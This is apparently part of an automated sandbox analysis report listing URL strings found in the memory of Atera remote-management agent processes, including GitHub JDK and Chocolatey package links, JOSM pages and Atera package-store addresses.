Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdoptOpenJDK/openjdk14-binaries/releases/download/jdk-14.0.2%2B12/OpenJDK14U-jre_
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/IdealChain/chocolatey-packages/tree/master/josm
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037318779.0000028A55B72000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219808571.00000247F8C32000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Roemer/chocolatey-packages
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/jdk11u/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/jdk17/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/jdk21/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/jdk8u/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.24%2B8/OpenJDK11U-jre_x86-
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jre_x64_
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.12%2B7/OpenJDK17U-jre_x86-
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.13%2B11/OpenJDK17U-jre_x64
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.5%2B11/OpenJDK21U-jre_x64_
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u422-b05/OpenJDK8U-jre_x86-32_wi
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u432-b06/OpenJDK8U-jre_x64_windo
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ajshastri/chocolatey-packages
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ajshastri/chocolatey-packages/tree/master/corretto-jre-8
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/asciidoctor/asciidoctorj
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/asciidoctor/asciidoctorj/issues
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bell-sw/Liberica
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bell-sw/Liberica/blob/master/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bell-sw/Liberica/issues
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bell-sw/Liberica/releases/download/17.0.13
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCBDE2000.00000002.00000001.01000000.00000044.sdmp	String found in binary or memory: https://github.com/chocolatey/chocolatey-coreteampackages
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/corretto
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/corretto/corretto-8/blob/develop/LICENSE
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/flcdrg/au-packages/tree/master/TeamCity-PreinstalledJRE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/flcdrg/au-packages/tree/master/teamcity
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/flyway/flyway
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/flyway/flyway/issues
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/geraldcombs/chocolatey-packages
Source: AteraAgent.exe, 0000000E.00000002.2403751991.000001A5726F2000.00000002.00000001.01000000.00000026.sdmp	String found in binary or memory: https://github.com/icsharpcode/SharpZipLib
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/johanjanssen/AdoptOpenJDKChocolateyPackages
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/johanjanssen/ChocolateyPackages/tree/master/AdoptOpenJDKJRE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/johanjanssen/ChocolateyPackages/tree/master/OpenJDK11
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nlog/NLog/wiki/Configuration-file#variables
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nlog/NLog/wiki/Layout-Renderers
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nlog/NLog/wiki/Targets
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nlog/nlog/wiki/Configuration-file
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/openjdk/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rgra/choco-packages/tree/master/server-jre
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rgra/choco-packages/tree/master/server-jre10
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rgra/choco-packages/tree/master/server-jre8
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/browser/josm/trunk
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/browser/trunk/LICENSE
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/download/windows/josm-setup-19265-java21.exe
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/report
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/wiki/Changelog
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://josm.openstreetmap.de/wiki/Help
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lists.openstreetmap.org/listinfo/josm-dev
Source: AgentPackageSTRemote.exe, 00000021.00000002.2945403740.000002300018B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://my.splashtop.com
Source: AgentPackageSTRemote.exe, 00000021.00000000.2113797571.0000023071932000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://my.splashtop.com/csrs/win
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219739634.00000247F8C28000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: https://nlog-project.org/
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFDC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packagesstore.blob.core.windows.net
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://packagesstore.blob.core.windows.net/installers/BitDefender/rmm.zip
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFDC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MSI/1.8.7.2/Setupx64.msi
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MacAgent/1.0/AteraAgentInstaller.pkgA/
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric5Get
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.ateH
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/a
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/ag
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAe
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAease
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAg
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAge8X
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentI
